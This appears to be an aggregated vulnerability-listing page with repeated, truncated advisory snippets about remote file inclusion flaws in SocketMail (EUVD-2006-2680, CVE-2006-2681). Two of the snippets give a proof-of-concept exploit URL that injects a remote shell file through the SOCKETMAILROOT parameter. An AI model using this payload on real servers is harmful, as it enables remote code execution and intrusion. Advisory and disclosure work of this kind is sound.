EUVD-2006-2680

Malware in sbrugna...

SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability

No description provided by source. Vulnerability Type: Remote File Inclusion Vulnerable file: /mail/content/fnc-readmail3.php Exploit URL: http://localhost/mail/content/fnc-readmail3.php?SOCKETMAILROOT=http://localhost/shell.txt? Method: get Registerglobals: On Vulnerable variable: SOCKETMAILROOT...

socketmail-rfi.txt

Vulnerability Type: Remote File Inclusion Vulnerable file: /mail/content/fnc-readmail3.php Exploit URL: http://localhost/mail/content/fnc-readmail3.php?SOCKETMAILROOT=http://localhost/shell.txt? Method: get Registerglobals: On Vulnerable variable: SOCKETMAILROOT Line number: 399 Lines:...

CVE-2006-2681

PHP remote file inclusion vulnerability in SocketMail Lite and Pro 2.2.6 and earlier, when registerglobals and magicquotes are enabled, allows remote attackers to execute arbitrary PHP code via a URL in the sitepath parameter to 1 index.php and 2 inc-common.php...

Remote file inclusion

PHP remote file inclusion vulnerability in SocketMail Lite and Pro 2.2.6 and earlier, when registerglobals and magicquotes are enabled, allows remote attackers to execute arbitrary PHP code via a URL in the sitepath parameter to 1 index.php and 2 inc-common.php...

CVE-2006-2681

PHP remote file inclusion vulnerability in SocketMail Lite and Pro 2.2.6 and earlier, when registerglobals and magicquotes are enabled, allows remote attackers to execute arbitrary PHP code via a URL in the sitepath parameter to 1 index.php and 2 inc-common.php...

CVE-2006-2681

CVE-2006-2681 describes a PHP remote file inclusion in SocketMail Lite and Pro 2.2.6 and earlier. When both register_globals and magic_quotes are enabled, an attacker can supply a URL in the site_path parameter to (1) index.php or (2) inc-common.php to execute arbitrary PHP code on the server. Th...